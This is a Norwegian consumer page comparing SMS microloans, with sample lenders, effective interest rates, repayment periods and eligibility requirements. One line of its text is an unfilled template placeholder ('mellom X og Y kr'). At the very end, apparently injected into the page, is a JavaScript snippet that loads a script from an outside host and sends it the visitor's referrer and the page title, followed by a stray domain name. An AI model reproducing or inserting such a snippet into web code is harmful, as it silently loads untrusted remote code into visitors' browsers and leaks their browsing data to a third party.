Sammenlign og les mer om smslån. Finn de beste smslån her

Långivere Eff. rente Time
Eks: 25k o/5 år, 15,13%, etb 695. Tot: 35008.
15.13 % 5 år Søk lån
Eks: 5000 30 dager, 371%, etb 284. Tot: 5679.
371 % 30 dager Søk lån
Eks: 10k o/5 år, 37,37%, etb 293. Tot: 27580.
37,37 % 5 år Søk lån

Långivere Eff. rente Løpetid
Eks: 25k o/5 år, 15,13%, etb 695. Tot: 35008.
15,13 % 5 år Søk lån
Eks: 10k o/5 år, 37,37%, etb 293. Tot: 27580.
37,37 % 5 år Søk lån
Eks: 5000 30 dager, 371%, etb 284. Tot: 5679.
371 % 30 dager Søk lån

Grunnleggende informasjon

Et SMS lån er en form for mikrolån. Det betyr at lånebeløpet vanligvis er liten, men man får pengene raskt, på den andre siden.Siden et SMS lån er et mikrolån, varierer lånebeløpet vanligvis mellom X og Y kr. Långiverne er ofte fokusert på et bestemt lånebeløp spekter. Så, før man bestemmer hvilken utlåner å velge for sitt SMS lån, skal man vurdere hvor mye penger man trenger. Siden mikrolån som SMS-lån er ganske dyre, skal man aldri låne mer enn man trenger.

Et SMS lån er et usikret lån som betyr at man ikke trenger å tilby noen slags sikkerhet til utlåneren; det er ikke noe de kan kreve dersom man ikke er i stand til å tilbakebetale sitt SMS-lån. Dette gjør søkeprosessen svært enkel men siden denne formen for lån er mye mer risikabel for utlåneren, vil kostnaden på lånet også være høyere. Når man tenker på et SMS lån, bør man være oppmerksom på at det handler seg om et ganske dyrt lån. Mange långivere gjemmer også sine kostnader gjennom ulike gebyrer og straffegebyrer, noe som kan gjøre SMS lånet dyrere enn man hadde forventet. Dersom man f. eks. ikke klarer å tilbakebetale SMS lånet i tide, kan utlåneren belaste en med et ekstra gebyr ifm sen betaling. Man skal alltid huske å sammenligne og se etter alle kostnader forbundet med et SMS lån.

Nedbetalingstid

Nedbetalingsperioden for et SMS lån kan variere blant långiverne, men vanligvis er låneperioden rundt 30 dager. Når man bestemmer over hvor man låner, man skal vurdere hvor lenge man ønsker å låne pengene. Hvis man ønsker å låne penger for en tidsperiode som er lengre enn 30 dager, er det ganske få långivere man kan henvende seg dersom det handler seg om et SMS-lån. Det er kanskje et annet lån, liksom et privatlån, som er mer passende i dette tilfellet.

Krav

For å få et SMS lån innvilget er det krav på at man er myndig, altså 18 år eller eldre. Utlåneren vil også kreve at man har en tilstrekkelig privat økonomi før man kan få et SMS lån. Dette kontrolleres vanligvis ved at långiveren gjennomfører søkerens kreditt historie sjekk. Långivere skiller seg når det gjelder reglene om søkerens kredittevne. Långivere som fokuserer på mindre lånebeløp er mer sannsynlig å godkjenne søkere med registrering av manglende betalinger. Andre långivere gjør mer omfattende kredittsjekk og kan nekte søkere med dårlig kreditthistorie. Når man sammenligner SMS långivere, skal man sørge for å vite alt om sin egen kreditthistorie, men også se på långivernes betingelser og krav til kredittverdighet. Det kan være tidkrevende å søke om en rekke SMS lån når kreditthistorie ikke stemmer overens med långivernes krav.

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; topspyapps.net